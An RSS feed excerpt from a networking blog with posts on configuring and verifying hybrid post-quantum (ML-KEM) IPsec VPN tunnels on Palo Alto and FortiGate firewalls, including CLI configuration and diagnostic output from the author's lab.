href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-08-Palo-IPsec-Tunnel.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14527" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-08-Palo-IPsec-Tunnel-1024x673.png" alt="" width="604" height="397" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-08-Palo-IPsec-Tunnel-1024x673.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-08-Palo-IPsec-Tunnel-300x197.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-08-Palo-IPsec-Tunnel-768x505.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-08-Palo-IPsec-Tunnel-1536x1010.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-08-Palo-IPsec-Tunnel.png 1600w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h3>Fortinet FortiGate</h3>
<p>On the Forti, it&#8217;s these steps that are done completely in the VPN Tunnels pane:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-09-Forti-Custom-VPN.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14528" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-09-Forti-Custom-VPN-1024x840.png" alt="" width="604" height="495" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-09-Forti-Custom-VPN-1024x840.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-09-Forti-Custom-VPN-300x246.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-09-Forti-Custom-VPN-768x630.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-09-Forti-Custom-VPN-1536x1260.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-09-Forti-Custom-VPN.png 1670w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-10-Forti-Phase-1.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14529" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-10-Forti-Phase-1-1024x988.png" alt="" width="604" height="583" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-10-Forti-Phase-1-1024x988.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-10-Forti-Phase-1-300x290.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-10-Forti-Phase-1-768x741.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-10-Forti-Phase-1-1536x1483.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-10-Forti-Phase-1.png 1670w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-11-Forti-Phase-2-Selector.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14530" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-11-Forti-Phase-2-Selector-1024x606.png" alt="" width="604" height="357" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-11-Forti-Phase-2-Selector-1024x606.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-11-Forti-Phase-2-Selector-300x177.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-11-Forti-Phase-2-Selector-768x454.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-11-Forti-Phase-2-Selector.png 1474w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-12-Forti-Phase-2-Encryption.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14531" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-12-Forti-Phase-2-Encryption-983x1024.png" alt="" width="604" height="629" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-12-Forti-Phase-2-Encryption-983x1024.png 983w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-12-Forti-Phase-2-Encryption-288x300.png 288w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-12-Forti-Phase-2-Encryption-768x800.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-12-Forti-Phase-2-Encryption-1474x1536.png 1474w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-12-Forti-Phase-2-Encryption.png 1668w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>On the CLI, it&#8217;s this (excluding the tunnel interface and the static route). Note the <code>set addke1 ml-kem-1024</code> lines.</p><pre class="urvanov-syntax-highlighter-plain-tag">config vpn ipsec phase1-interface
    edit "pa-lab"
        set interface "wan1"
        set ip-version 6
        set ike-version 2
        set peertype any
        set net-device disable
        set proposal aes256gcm-prfsha512
        set dhgrp 21
        set addke1 ml-kem-1024
        set nattraversal disable
        set transport udp
        set remote-gw6 2a00:6020:ad0b:8303::2
        set psksecret ENC Hr6QZodcvtxFwPEt4i1acXEZJIwGCboi1zx4+tA1CAB0zZR9jnIQMcYYpc375bFqulodhZmcN3IIA1JVaDTgK5y3gIG5VuCpkXwsaLQH8Tf4jRJEMTQYg2bBD/QpU8HGJgdEwyBvoRs880zTPoGr6fVsSLgy7smftEQi1NGzMW1M6S7QoEDyjopO6nKKQB0I/+4k6VlmMjY3dkVA
    next
end
config vpn ipsec phase2-interface
    edit "all-ipv6"
        set phase1name "pa-lab"
        set proposal aes256gcm
        set dhgrp 21
        set addke1 ml-kem-1024
        set src-addr-type subnet6
        set dst-addr-type subnet6
        set keylifeseconds 3600
    next
end</pre><p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/network-traffic-tapping" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketRaven.1208x232.webp" /></a></div>
<h2>Verify</h2>
<p>Both firewalls deliver only basic &#8220;it&#8217;s working&#8221; green icons in the GUI:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-13-Palo-IKE-Info.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14533" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-13-Palo-IKE-Info-1024x513.png" alt="" width="604" height="303" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-13-Palo-IKE-Info-1024x513.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-13-Palo-IKE-Info-300x150.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-13-Palo-IKE-Info-768x385.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-13-Palo-IKE-Info-1536x770.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-13-Palo-IKE-Info.png 1600w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-14-Forti-IPsec-Dashboard.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14534" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-14-Forti-IPsec-Dashboard-1024x396.png" alt="" width="604" height="234" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-14-Forti-IPsec-Dashboard-1024x396.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-14-Forti-IPsec-Dashboard-300x116.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-14-Forti-IPsec-Dashboard-768x297.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-14-Forti-IPsec-Dashboard-1536x594.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-14-Forti-IPsec-Dashboard-2048x792.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<p>If you want to verify whether or not post-quantum ciphers are used, the <strong>CLI</strong> is a must. Note the ML-KEM keywords:</p>
<p><strong>Palo</strong>:</p>
<p><code>show vpn ike-sa detail gateway &lt;name&gt;</code> and</p>
<p><code>show vpn ipsec-sa tunnel &lt;name&gt;</code>:</p><pre class="urvanov-syntax-highlighter-plain-tag">weberjoh@pa-lab&gt; show vpn ike-sa detail gateway fg-lab 

IKE Gateway fg-lab, ID 2 2a00:6020:ad0b:8303::2 =&gt; 2a00:6020:ad0b:8303::9
  Current time: Jun.18 09:28:56

IKE SA:
  SPI:  9835E5BCE743D9A4:8153CAA28008FAA6  Init
        State:      Established
        SN:         11
        Authentication:  PSK, peer PSK
        Proposal:   AES256-GCM16/COMBINED/DH21/ML-KEM-1024/NONE/NONE/NONE/NONE/NONE/NONE
        ID local:   ipaddr:2a00:6020:ad0b:8303::2
           remote:  ipaddr:2a00:6020:ad0b:8303::9
        ID_i:       IPv6_address:2a00:6020:ad0b:8303::9
        ID_r:       IPv6_address:2a00:6020:ad0b:8303::2
        NAT:        Not detected
        Message ID: rx 6, tx 1914
        Liveness check: sending informational packet after idle 5 seconds

        Created:    Jun.18 06:49:24, 2 hours 39 minutes 33 seconds ago
        Expires:    Jun.18 14:49:24, rekey in 4 hours 8 minutes 2 seconds (24455 sec)

  Child SA 29914:
        Tunnel 2    fg-lab
        Type:       ESP       Resp
        State:      Mature
        Message ID: 00000004
        Parent SN:  11
        SPI:        A50203B8 : BEA130B7  &lt;= ESP: BEA130B6
        Algorithm:  AES256-GCM16/COMBINED/DH21/ML-KEM-1024
        TS local:   Proto:any, ::-ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff, Ports:any
        TS remote:  Proto:any, ::-ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff, Ports:any
        Created:    Jun.18 09:08:36, 20 minutes 21 seconds ago
        Expires:    Jun.18 10:08:36, rekey in 33 minutes 2 seconds (3203 sec)



weberjoh@pa-lab&gt; 
weberjoh@pa-lab&gt; 
weberjoh@pa-lab&gt; show vpn ipsec-sa tunnel fg-lab 

GwID/client IP  TnID   Peer-Address                            Tunnel(Gateway)                                                                                                                  Algorithm                                                        SPI(in)  SPI(out) life(Sec/KB)             remain-time(Sec)        
--------------  ----   ------------                            ---------------                                                                                                                  ---------                                                        -------  -------- ------------             ----------------        
2               2      2a00:6020:ad0b:8303::9                  fg-lab(fg-lab)                                                                                                                   ESP/G256/   /DH21/ML-KEM-1024                                    A50203B8 BEA130B7 3600/Unlimited           2357                     

Show IPSec SA: Total 1 tunnels found. 1 ipsec sa found.</pre><p>
&nbsp;</p>
<p><strong>Forti</strong>:</p>
<p>Please note that neither of the following two commands show the key agreement protocol, hence are not usable here: <span class="crayon-c"><code>get vpn ike gateway &lt;name&gt;</code>, <code>get vpn ipsec tunnel name &lt;name&gt;</code>.</span></p>
<p><span class="crayon-c">&#8211;&gt; <strong>This is the one: <code>diagnose vpn ike gateway list name &lt;name&gt;</code></strong>:</span></p><pre class="urvanov-syntax-highlighter-plain-tag">fg-lab # diagnose vpn ike gateway list name pa-lab

vd: root/0
name: pa-lab
version: 2
interface: wan1 5
addr: 2a00:6020:ad0b:8303::9:500 -&gt; 2a00:6020:ad0b:8303::2:500
tun_id: 10.0.0.1/::10.0.0.1
remote_location: 0.0.0.0
network-id: 0
transport: UDP
created: 78734s ago
peer-id: 2a00:6020:ad0b:8303::2
peer-id-auth: no
pending-queue: 0
PPK: no
IKE SA: created 2/5  established 2/5  time 20/4238/21070 ms
IPsec SA: created 1/25  established 1/25  time 0/866/21070 ms

  id/spi: 320 15b515dc59e0a898/cb080b494e28fca3
  direction: responder
  status: established 3212-3212s ago = 20ms
  proposal: aes256gcm
  child: yes
  SK_ei: cfbac895857d9ed8-7954388f85030dc3-f2b0e7bb050f2143-45c69edfa3d5377d-b954a6bc
  SK_er: d062865f3b430a50-795d4be04b81d0a7-5d8cea7d6665c54c-f761ddc81470c232-e64fd33e
  SK_ai: 
  SK_ar: 
  message-id sent/recv: 2/642
  QKD: no
  PQC-KEM (IKE): yes
  PQC-KEM (all IPsec): yes
  lifetime/rekey: 86400/82917
  DPD sent/recv: 00000000/00000000
  peer-id: 2a00:6020:ad0b:8303::2</pre><p>
That&#8217;s it. Happy networking. :)</p>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@huguesdb?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Hugues de BUYER-MIMEURE</a> on <a href="https://unsplash.com/photos/timelapse-photo-of-tunnel-85S5K7GJ9YY?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/pqc-vpn-tunnel-between-palo-alto-fortigate/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14491</post-id>	</item>
		<item>
		<title>PQC VPN-Tunnel with Palo</title>
		<link>https://weberblog.net/pqc-vpn-tunnel-with-palo/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pqc-vpn-tunnel-with-palo</link>
					<comments>https://weberblog.net/pqc-vpn-tunnel-with-palo/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Wed, 10 Jun 2026 10:52:58 +0000</pubDate>
				<category><![CDATA[IPsec/VPN]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[Post-Quantum (PQC)]]></category>
		<category><![CDATA[IKEv2]]></category>
		<category><![CDATA[ML-KEM]]></category>
		<category><![CDATA[PAN-OS]]></category>
		<category><![CDATA[Post-Quantum Cryptography]]></category>
		<category><![CDATA[PQC]]></category>
		<category><![CDATA[Site-to-Site VPN]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14472</guid>

					<description><![CDATA[<img width="300" height="150" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-300x150.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-300x150.jpg 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-1024x512.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-768x384.jpg 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-1536x768.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />As the advent of practical quantum computing draws closer, security vendors are increasingly introducing post-quantum cryptographic (PQC) algorithms to protect existing security architectures against future threats. One important use case is site-to-site VPN connectivity, where organisations must address the &#8220;harvest now, decrypt later&#8221; risk &#8211; the possibility that encrypted traffic captured today could be decrypted &#8230; <a href="https://weberblog.net/pqc-vpn-tunnel-with-palo/" class="more-link">Continue reading <span class="screen-reader-text">PQC VPN-Tunnel with Palo</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="150" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-300x150.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-300x150.jpg 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-1024x512.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-768x384.jpg 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image-1536x768.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-with-Palo-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>As the advent of practical quantum computing draws closer, security vendors are increasingly introducing <a href="https://en.wikipedia.org/wiki/Post-quantum_cryptography" target="_blank" rel="noopener"><strong>post-quantum cryptographic (PQC)</strong></a><strong> algorithms</strong> to protect existing security architectures against future threats. One important <strong>use case is site-to-site VPN connectivity</strong>, where organisations must address the &#8220;<a href="https://en.wikipedia.org/wiki/Harvest_now,_decrypt_later" target="_blank" rel="noopener">harvest now, decrypt later</a>&#8221; risk &#8211; the possibility that encrypted traffic captured today could be decrypted by quantum computers in the future.</p>
<p>To mitigate this threat, Palo Alto Networks has implemented several approaches for quantum-resistant VPN tunnels, including <strong>Post-Quantum Preshared Keys (PPK)</strong>, <strong>Key Encapsulation Mechanisms (KEM)</strong>, and <strong>Quantum Key Distribution (QKD)</strong>. Each method offers a different balance of security, complexity, and operational requirements.</p>
<p>In this blog post, we will examine these approaches in detail, with a particular focus on KEM-based solutions, which are generally considered the preferred path forward. We will also demonstrate <strong>how to configure a site-to-site VPN tunnel that combines traditional Diffie-Hellman (DH) key exchange with post-quantum algorithms</strong> such as Kyber (standardised by NIST as ML-KEM), providing both classical and quantum-resistant security.</p>
<p><span id="more-14472"></span></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">This is one of many VPN articles on my blog. &#8211;&gt; <a href="https://weberblog.net/site-to-site-vpn-tutorials/">Have a look at this full list</a>. &lt;&#8211;</div></div>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetfalcon-packet-capture" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketFalcon.1208x232.webp" /></a></div>
<h2>Post-Quantum Security for VPN-Tunnels</h2>
<p>The primary challenge posed by quantum computers is their ability to break the asymmetric cryptographic algorithms that are widely used today for key exchange, most notably Diffie-Hellman (DH) and Elliptic Curve Diffie-Hellman (ECDH). As a result, we need new ways to securely establish VPN session keys over an untrusted network, such as the Internet.</p>
<p>Palo Alto Networks currently supports three approaches to address this challenge:</p>
<h3>PPK (Post-Quantum Preshared Key)</h3>
<p>Specified in <a href="https://www.rfc-editor.org/info/rfc8784/" target="_blank" rel="noopener">RFC 8747</a>, PPK is the <strong>simplest approach</strong>. It introduces <strong>an additional secret</strong>, known only to both VPN peers, into the key derivation process. (Do not confuse this with the traditional VPN PSK used for authentication. The PPK serves a different purpose and contributes to key establishment.)</p>
<p>Because the PPK is a randomly generated secret and not derived from a mathematically solvable key exchange, it remains resistant to attacks from both classical and quantum computers. Even if an attacker were able to break the DH exchange in the future, they would still require knowledge of the PPK to derive the session keys.</p>
<p><strong>The downside is scalability.</strong> Every VPN tunnel requires its own securely distributed PPK, creating an additional operational burden. Furthermore, if an attacker records VPN traffic today and later obtains the corresponding PPK, the recorded traffic may become decryptable. In other words, the strong forward secrecy properties (PFS) normally provided by ephemeral key exchanges are reduced.</p>
<h3>KEM (Key Encapsulation Mechanism)</h3>
<p>KEM-based key exchange is expected to become the preferred solution for most deployments. Instead of relying solely on classical DH or ECDH groups, <strong>a post-quantum algorithm is used to establish shared key material</strong>. In many implementations, including current VPN solutions, <strong>the post-quantum mechanism is combined with traditional DH/ECDH in a hybrid approach</strong>, providing protection against both classical and quantum attacks.</p>
<p>Several post-quantum KEM algorithms have been proposed over the years. NIST has standardised CRYSTALS-Kyber as <strong>ML-KEM</strong> (Module-Lattice-Based Key Encapsulation Mechanism), which is currently the leading candidate for widespread deployment. Additional algorithms, such as HQC, may be standardised in the future as alternative options.</p>
<p>When using post-quantum key exchange in IKEv2, the exchange is typically performed in a hybrid manner. <strong>A classical key exchange, such as ECDH Group 21, is combined with at least one additional post-quantum key exchange round (for example, ML-KEM)</strong>. The resulting key material is derived from both exchanges, ensuring that the VPN remains secure as long as at least one of the underlying mechanisms remains uncompromised.</p>
<p>While a single classical and a single post-quantum exchange are sufficient for most deployments, <strong>IKEv2 allows multiple additional key exchange rounds to be performed</strong>. This can further diversify the cryptographic assumptions, although the practical security benefit quickly diminishes. <strong>For most environments, one classical and one post-quantum exchange strike a sensible balance between security and complexity</strong>; configuring multiple post-quantum rounds is generally considered a rather conservative &#8211; or perhaps slightly paranoid &#8211; approach. (The German way. 😂)</p>
<h3>QKD (Quantum Key Distribution)</h3>
<p>This is where things become truly futuristic. :)</p>
<p>QKD uses the <strong>principles of quantum mechanics to exchange cryptographic key material</strong>. Any attempt to observe or intercept the quantum transmission changes its physical properties, allowing eavesdropping attempts to be detected.</p>
<p>In practice, <strong>QKD requires specialised hardware and a dedicated quantum communication channel, typically a fibre-optic connection</strong> between the participating sites. The generated keys are then used by conventional VPN technologies running over normal network links.</p>
<p>While QKD offers fascinating security properties, it also introduces high cost and operational complexity. For this reason, it is currently limited to highly specialised environments. Personally, I do not expect to deploy many QKD-enabled VPNs in the next few years &#8211; at least not in my lab. 🙂</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetowl-suricata-ids-basiertes-hochleistungs-nsm" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketOwl.1208x232.webp" /></a></div>
<h2>PQ-Variants in PAN-OS Versions</h2>
<p>Note that PANW has implemented those variants sequentially. Depending on your PAN-OS version, you&#8217;ll see none up to all three of them. ;) Links: <a href="https://docs.paloaltonetworks.com/pan-os/11-1/pan-os-release-notes/features-introduced-in-pan-os/networking-features" target="_blank" rel="noopener">PAN-OS 11.1</a>, <a href="https://docs.paloaltonetworks.com/pan-os/11-2/pan-os-release-notes/features-introduced-in-pan-os/networking-features" target="_blank" rel="noopener">PAN-OS 11.2</a>.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-14477 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/PAN-OS-PQ-Variants.png" alt="" width="750" height="568" srcset="https://weberblog.net/wp-content/uploads/2026/06/PAN-OS-PQ-Variants.png 750w, https://weberblog.net/wp-content/uploads/2026/06/PAN-OS-PQ-Variants-300x227.png 300w" sizes="auto, (max-width: 750px) 100vw, 750px" /></p>
<p>Also note that with PAN-OS 11.2 and 12.1, the list of ciphers is different:</p>
<ul>
<li><strong>PAN-OS 11.2</strong> offers various pre-standardised ciphers such as Kyber, Bike, FrodoKEM, HQC, but *not yet* the NIST standard of ML-KEM.</li>
<li><strong>PAN-OS 12.1</strong> offers all of them as well, but additionally the NIST standard <strong>ML-KEM</strong>.</li>
</ul>
<h2>Example: S2S-VPN between 2x Palos</h2>
<p>For this lab, I&#8217;m using 2x PA-440, one with <strong>PAN-OS 11.2.12</strong> &#8220;pa-home&#8221;, the other with <strong>12.1.6</strong> &#8220;pa-lab&#8221;. Hence, I can&#8217;t use ML-KEM (since it was only added with PAN-OS 12.1), but the underlying protocol Kyber. All following screenshots/listings are from PAN-OS 12.1.6.</p>
<p>The first step is to <strong>add the appropriate crypto profiles for IKE as well as for IPsec</strong>: [By the way: For AES-GCM with DH group 21, sha512 is used as the PRF. This is not documented anywhere 🤦 but a logical step since group 19 uses sha256 and group 20 uses sha384, <a href="https://docs.paloaltonetworks.com/network-security/ipsec-vpn/administration/set-up-site-to-site-vpn/define-cryptographic-profiles/define-ike-crypto-profiles" target="_blank" rel="noopener">which is documented here</a>.]
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-14478 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-01-IKE-Crypto-Profile.png" alt="" width="1000" height="588" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-01-IKE-Crypto-Profile.png 1000w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-01-IKE-Crypto-Profile-300x176.png 300w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-01-IKE-Crypto-Profile-768x452.png 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px" /> <img loading="lazy" decoding="async" class="aligncenter wp-image-14479 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-02-IKE-Crypto-Profile-Advanced-Options.png" alt="" width="1000" height="658" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-02-IKE-Crypto-Profile-Advanced-Options.png 1000w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-02-IKE-Crypto-Profile-Advanced-Options-300x197.png 300w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-02-IKE-Crypto-Profile-Advanced-Options-768x505.png 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px" /> <img loading="lazy" decoding="async" class="aligncenter wp-image-14480 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-03-IPsec-Crypto-Profile.png" alt="" width="1000" height="613" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-03-IPsec-Crypto-Profile.png 1000w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-03-IPsec-Crypto-Profile-300x184.png 300w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-03-IPsec-Crypto-Profile-768x471.png 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px" /> <img loading="lazy" decoding="async" class="aligncenter wp-image-14481 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-04-IPsec-Crypto-Profile-Advanced-Options.png" alt="" width="1000" height="444" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-04-IPsec-Crypto-Profile-Advanced-Options.png 1000w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-04-IPsec-Crypto-Profile-Advanced-Options-300x133.png 300w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-04-IPsec-Crypto-Profile-Advanced-Options-768x341.png 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px" /></p>
<p>Next is to tune <strong>the IKE Gateway</strong>. Assuming you already have a working site-to-site VPN setup, you need to set the following:</p>
<ul>
<li><strong>IKE Crypto Profile</strong> with PQ ciphers set a minute ago</li>
<li><strong>IKEv2 Fragmentation</strong> (otherwise you&#8217;ll get an operation failed with &#8220;pq-kem constraints failed: IKEv2 fragmentation must be enabled for PQ KEM&#8221;) with a blank line, which then defaults to some values. (There is a bug with PAN-OS 12.1.6 which sets the value to 576 if left blank. Since I&#8217;m using IPv6, I&#8217;ve set it to 1280 manually.)</li>
<li><strong>PQ KEM: Enable Post-Quantum Key Exchange</strong> and &#8220;Block IKEv2 if vulnerable cipher is used&#8221;, whatever this means.</li>
</ul>
<p>as well as the <strong>IPsec Crypto Profile at the IPsec Tunnel</strong>:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-14482 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-05-IKE-Gateway.png" alt="" width="750" height="609" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-05-IKE-Gateway.png 750w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-05-IKE-Gateway-300x244.png 300w" sizes="auto, (max-width: 750px) 100vw, 750px" /> <img loading="lazy" decoding="async" class="aligncenter wp-image-14483 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-06-IKE-Gateway-Advanced-Options.png" alt="" width="750" height="568" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-06-IKE-Gateway-Advanced-Options.png 750w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-06-IKE-Gateway-Advanced-Options-300x227.png 300w" sizes="auto, (max-width: 750px) 100vw, 750px" /> <img loading="lazy" decoding="async" class="aligncenter wp-image-14484 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-07-IKE-Gateway-Advanced-Options-PQ-KEM.png" alt="" width="750" height="436" srcset="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-07-IKE-Gateway-Advanced-Options-PQ-KEM.png 750w, https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-07-IKE-Gateway-Advanced-Options-PQ-KEM-300x174.png 300w" sizes="auto, (max-width: 750px) 100vw, 750px" /> <img loading="lazy" decoding="async" class="aligncenter wp-image-14485 size-full" src="https://weberblog.net/wp-content/uploads/2026/06/Palo-PQ-VPN-08-IPsec-Tunnel.png" alt="" width="1000" height="656" 